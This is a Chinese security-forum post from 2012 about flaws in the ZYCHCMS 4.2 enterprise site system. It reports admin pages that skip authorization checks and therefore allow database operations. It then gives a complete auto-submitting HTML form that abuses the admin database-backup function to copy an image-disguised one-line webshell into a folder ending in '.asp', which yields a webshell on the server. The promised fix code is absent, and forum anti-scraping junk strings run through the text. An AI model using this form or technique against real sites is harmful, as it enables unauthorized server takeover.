找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1887|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

8 o2 U' z6 k5 R0 \1 _. F+ z. Y  E0 i7 j
9 l. R, ?+ B# G8 D7 e; ^0 v* [9 O
  {4 Y& X1 |; \6 t1 o
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
, V, I( C1 F' |& D, ?7 h7 F ①SQL注射漏洞7 t! x& M0 x4 _
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp6 E9 |3 n4 Q& u; r
漏洞原因:未过滤; d" {+ R8 h1 i2 c
漏洞代码:+ u+ B: T- |; g& q0 `
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
$ f. t1 |4 b% h! z, z$ m) h 修复方法:在文件开头加入代码" L3 K! Y7 {5 H; e

* q  u) R( x) Z/ `  U9 ~' @, l- q6 A- E+ r/ _
②后台拿WBSHELL4 J+ z5 Z* d6 _& T! D. g& m
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
# i. n# ~# U: F 这里在网上找了一个,改了下,将就着用。
4 ]/ u- v1 t% r. x. }  s 以下是代码本地提交代码( \5 S4 k. v& ^: p8 T+ G' h
$ ?5 C. h2 \3 q+ r3 d: b

4 C9 P, m* G1 o/ q& j' C8 R<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>7 Q+ ]7 ]( q& m; X
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>0 }2 p$ i- D& B: A
<tr>& J, P! F* w$ m  h/ z' c2 y
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>/ K. W) x% _9 L+ v5 T, D# r
</tr>
+ p% i; X7 g/ ^1 |) C <tr>
+ l; I- D+ Q; n4 s <td bgcolor=”#FFFFFF”><span class=”back_southidc”>- t3 G* }% u9 F) b0 Q7 r
</span>
% \$ m5 k* [4 |: k1 Y4 ` <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >3 E, E/ S& N; K9 d, V
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
' Q0 y8 j! L; ?* D <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
5 ^! Q; v. Y! I2 A <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
/ D6 f1 {- T* o& {1 c4 W6 z <div align=”left”>/ J" r8 g* Q1 n/ |( b0 B, D1 J6 f$ b
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />5 i# {! ?5 ~& b: l2 M
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
0 ^4 ^# \, V: |. z4 ]8 m% ` <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
# ?- X' F- u; u4 w" `8 T1 ^, c </div></td>1 Q5 A& [/ u- S( t& K% w- G
</tr>
5 L- y' ~& Y( b <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
; B/ L7 n- j$ |2 ^, \: F/ [ <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
" |+ b, Y: |2 O9 k& u8 ~4 ~) s5 ^ <td class=”td”><div align=”left”>/ l, h& A5 S9 I
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />  \9 ^9 ^5 |3 l
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>: B0 p2 L1 K; N( {! F2 m' x
</tr>8 a0 }1 C$ Z, R- U
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
2 e$ Q! v0 d$ @- m" f <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>% e! T; L8 B: g7 x
<td class=”td”><div align=”left”>1 P3 H% r( U/ m" ]1 T
<input type=”submit” value=”确定备份” class=”btn”/ T" c5 p$ G# }7 p( [! Y
</div></td>
3 j* f: h! z1 X </tr>: e& h* [; ^  J- r  e8 s% _- o5 P
</table></td></tr></form>
, L2 w' K, g9 }, S </table>& ]+ \3 N8 m( n
</td>
2 N) r2 w6 G! e </tr>. E+ H; T8 `  d
</table>
% b+ |2 ^) ]# Z# E' }9 y <script>+ l8 ]2 ~5 e" e7 B8 @
document.all.add.submit();: T6 v) _0 ^- v7 M
</script>
6 O. F% T* M5 ]( a " U, |7 G& T8 j+ H; g
" ]3 ~3 f! j5 B
0 |; N* `+ i7 D) i! y. \

3 x3 j: V6 q+ C! x4 F; D  c' ]) C; ^$ v, B& @
0 Z$ {; _3 t4 ?/ g8 q4 [7 F4 S4 X) X
: @5 m0 l/ }$ q. B
. b1 T$ D' d! r5 h& K

3 H1 B& R( C  \1 _6 i/ R  a& z
# Q2 S) Z% v# x) ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表